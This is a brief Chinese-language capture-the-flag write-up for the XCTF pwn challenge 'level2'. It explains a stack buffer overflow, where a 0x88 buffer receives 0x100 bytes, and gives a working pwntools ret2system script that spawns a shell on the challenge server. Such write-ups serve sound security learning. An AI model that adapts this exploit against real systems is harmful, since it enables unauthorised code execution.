题目来源xctf—pwn(level2)
拿到题目checksec一下
开了NX,放到ida里打开看看
初始的buf的空间只有0x88,但是读取我们输入的内容的时候,选择的大小确实 0x100,造成了溢出
找到_system的地址
构建exp如下
from pwn import *
p = remote('111.200.241.244',63643)
payload = b'a' * (0x88 + 4) + p32(0x0804845c) + p32(0x0804A024)
p.recvuntil("Input:\n")
p.sendline(payload)
p.interactive()
运行找到flag